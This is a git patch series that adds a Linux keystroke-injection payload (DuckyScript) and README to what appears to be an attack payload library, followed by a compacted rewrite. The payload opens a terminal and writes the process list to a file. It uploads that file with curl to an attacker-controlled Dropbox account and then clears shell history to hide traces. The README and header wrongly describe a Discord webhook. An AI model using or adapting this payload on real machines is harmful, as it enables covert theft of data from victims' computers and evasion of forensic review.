From 1b29844cc43e626e272dca768164805873d8fea4 Mon Sep 17 00:00:00 2001
From: Aleff
Date: Mon, 12 Jun 2023 12:02:44 +0200
Subject: [PATCH 1/3] Exfiltrate Process Info
---
 .../ExfiltrateProcessInfo_Linux/payload.txt | 72 +++++++++++++++++++
 1 file changed, 72 insertions(+)
 create mode 100644 payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
new file mode 100644
index 0000000..b3607ff
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
@@ -0,0 +1,72 @@
+REM ##########################################
+REM #                                        |
+REM # Title        : Exfiltrate Process Info |
+REM # Author       : Aleff                   |
+REM # Version      : 1.0                     |
+REM # Category     : Exfiltration            |
+REM # Target       : Linux                   |
+REM #                                        |
+REM ##########################################
+
+REM Requirements:
+REM - Internet Connection
+REM - Discord Webhook
+
+DELAY 1000
+CTRL-ALT t
+DELAY 2000
+
+
+REM #### GET PROCESS SECTION ####
+
+
+STRING ps aux > process.txt
+ENTER
+DELAY 500
+
+
+REM #### EXFILTRATE SECTION ####
+
+
+REM Required: Set here your Dropbox access TOKEN
+DEFINE TOKEN example
+STRING ACCESS_TOKEN="
+STRING TOKEN
+STRING "
+ENTER
+DELAY 500
+
+STRING USER_NAME=$(whoami)
+ENTER
+DELAY 500
+
+STRING TXT_PATH="/home/$USER_NAME/process.txt"
+ENTER
+DELAY 500
+
+REM Set yout Dropbox folder name
+DEFINE DROPBOX_FOLDER_NAME example
+STRING DROPBOX_FOLDER="/
+STRING DROPBOX_FOLDER_NAME
+STRING "
+ENTER
+DELAY 500
+
+DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+STRING curl -X POST
+STRING DROPBOX_API_CONST
+STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
+ENTER
+
+REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
+DELAY 2000
+
+
+REM #### REMOVE TRACES ####
+
+
+STRING history -c
+ENTER
+DELAY 500
+STRING exit
+ENTER
From bb1dc06398f4a9c106154420b70ed83a5e7a225c Mon Sep 17 00:00:00 2001
From: aleff-github
Date: Mon, 12 Jun 2023 12:03:10 +0200
Subject: [PATCH 2/3] Create README.md
---
 .../ExfiltrateProcessInfo_Linux/README.md | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md
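Review bot: The requirements header lists `REM - Discord Webhook`, but every line below it configures a Dropbox access token and posts to the Dropbox upload endpoint, so the header should read `REM - Dropbox access token` in place of the Discord line; the same stale lines survive as context in the patch 3 hunk, directly above the new `REM Required: Set here your Dropbox access TOKEN`, and the README added in patch 2 repeats the Discord wording in its description, dependencies and settings sections. The comment `REM Set yout Dropbox folder name` has a typo and should be `REM Set your Dropbox folder name`. Since the TOKEN define becomes a live Dropbox credential once filled in, the header is also the place to state that the file must never be committed or shared with a real value in it, e.g. `REM - Dropbox access token (keep the placeholder in version control; never commit a real token)`.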
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md
new file mode 100644
index 0000000..78c32e5
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md
@@ -0,0 +1,27 @@
+
+# Exfiltrate Process Info - Linux ✅
+
+A script used to exfiltrate the process info on a Linux machine.
+
+**Category**: Exfiltration
+
+## Description
+
+A script used to exfiltrate the process info on a Linux machine.
+
+Opens a shell, get the process info, set the Discord webhook configuration, send it to the discord webhook, erase traces.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* Discord Webhook
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+* Set the Discord Webhook configuration
\ No newline at end of file
From 28bad4530609505775446e2eafc7050b8a9085f0 Mon Sep 17 00:00:00 2001
From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com>
Date: Mon, 12 Jun 2023 14:36:12 -0400
Subject: [PATCH 3/3] Update payload.txt
---
 .../ExfiltrateProcessInfo_Linux/payload.txt | 62 +++++--------------
 1 file changed, 16 insertions(+), 46 deletions(-)
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
index b3607ff..5716a35 100644
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
@@ -12,61 +12,31 @@ REM Requirements: REM - Internet Connection REM - Discord Webhook -DELAY 1000 -CTRL-ALT t +REM Required: Set here your Dropbox access TOKEN +DEFINE #TOKEN example +DEFINE #DROPBOX_FOLDER_NAME example +DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload + + +DEFAULT_DELAY 500 +CTRL ALT t DELAY 2000 - REM #### GET PROCESS SECTION #### - - -STRING ps aux > process.txt -ENTER -DELAY 500 - +STRINGLN ps aux > process.txt REM #### EXFILTRATE SECTION #### - - -REM Required: Set here your Dropbox access TOKEN -DEFINE TOKEN example -STRING ACCESS_TOKEN=" -STRING TOKEN -STRING " -ENTER -DELAY 500 - -STRING USER_NAME=$(whoami) -ENTER -DELAY 500 - -STRING TXT_PATH="/home/$USER_NAME/process.txt" -ENTER -DELAY 500 +STRINGLN ACCESS_TOKEN="#TOKEN" +STRINGLN USER_NAME=$(whoami) +STRINGLN TXT_PATH="/home/$USER_NAME/process.txt" REM Set yout Dropbox folder name -DEFINE DROPBOX_FOLDER_NAME example -STRING DROPBOX_FOLDER="/ -STRING DROPBOX_FOLDER_NAME -STRING " -ENTER -DELAY 500 - -DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload -STRING curl -X POST -STRING DROPBOX_API_CONST -STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH" -ENTER +STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME" +STRINGLN curl -X POST #DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH" REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient DELAY 2000 - REM #### REMOVE TRACES #### - - -STRING history -c -ENTER -DELAY 500 -STRING exit -ENTER +STRINGLN history -c +STRINGLN exit